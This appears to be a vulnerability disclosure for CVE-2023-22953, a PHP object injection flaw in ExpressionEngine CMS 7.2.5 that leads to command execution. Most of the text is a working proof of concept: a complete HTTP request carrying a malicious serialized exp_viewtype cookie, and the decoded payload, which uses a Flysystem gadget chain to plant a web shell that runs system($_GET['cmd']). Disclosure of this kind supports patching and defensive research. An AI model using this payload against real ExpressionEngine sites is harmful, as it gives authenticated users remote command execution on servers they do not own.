- CVE ID: CVE-2023-22953
- Vulnerable version: 7.2.5
- Vulnerable software: ExpressionEngine CMS
- Link: https://expressionengine.com/
- Authors: Ahmed Sherif (@sherif_ninja) and Abood Nour (@AboodNour)
Arbitrary command execution via a PHP object injection vulnerability. The affected endpoint is /cp/addons/settings/filepicker; it can be exploited by sending a malicious serialized object in the exp_viewtype cookie. The Flysystem cached-storage Adapter class can be used to build a gadget chain that writes PHP files into the default app directory, so an authenticated user can turn the object injection into command execution on the underlying operating system.

Proof-of-concept request:
GET /admin.php?/cp/addons/settings/filepicker HTTP/1.1
Host: localhost:30001
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Purpose: prefetch
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: exp_last_visit=1671913623; exp_last_activity=1671968630; exp_viewtype=a%3A2%3A%7Bi%3A1337%3BO%3A67%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CCached%5C%5CStorage%5C%5CAdapter%22%3A4%3A%7Bs%3A7%3A%22adapter%22%3BO%3A58%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CAdapter%5C%5CLocal%22%3A4%3A%7Bs%3A10%3A%22rootExists%22%3Bb%3A0%3Bs%3A13%3A%22pathSeparator%22%3Bs%3A1%3A%22%2F%22%3Bs%3A10%3A%22writeFlags%22%3Bi%3A0%3Bs%3A10%3A%22pathPrefix%22%3Bs%3A32%3A%22%2Fvar%2Fwww%2Fhtml%2Fimages%2Ftesting.php%22%3B%7Ds%3A8%3A%22autosave%22%3Bb%3A0%3Bs%3A4%3A%22file%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22expire%22%3Bs%3A34%3A%22%3C%3Fphp+echo+system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%3B%7Di%3A1337%3Bs%3A5%3A%227knbh%22%3B%7D%; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%223f92644cb590bcfc68dab723c0211297faea6108e6c788b23da23ff45100808e41675301e75d960c6ac60df9021f5acc%22%7D; exp_csrf_token=fe3239026bae4959dfe79f2701e87d181d9d4a07; exp_sessionid=2684f59ade507f3ee6f45f6eef4eeff6edd686d8
Connection: close
Serialized payload, decoded:

a:2:{i:1337;O:67:"ExpressionEngine\\Dependency\\League\\Flysystem\\Cached\\Storage\\Adapter":4:{s:7:"adapter";O:58:"ExpressionEngine\\Dependency\\League\\Flysystem\\Adapter\\Local":4:{s:10:"rootExists";b:0;s:13:"pathSeparator";s:1:"/";s:10:"writeFlags";i:0;s:10:"pathPrefix";s:29:"/var/www/html/images/file.php";}s:8:"autosave";b:0;s:4:"file";s:0:"";s:6:"expire";s:34:"<?php echo system($_GET['cmd']);?>";}i:1337;s:5:"7knbh";}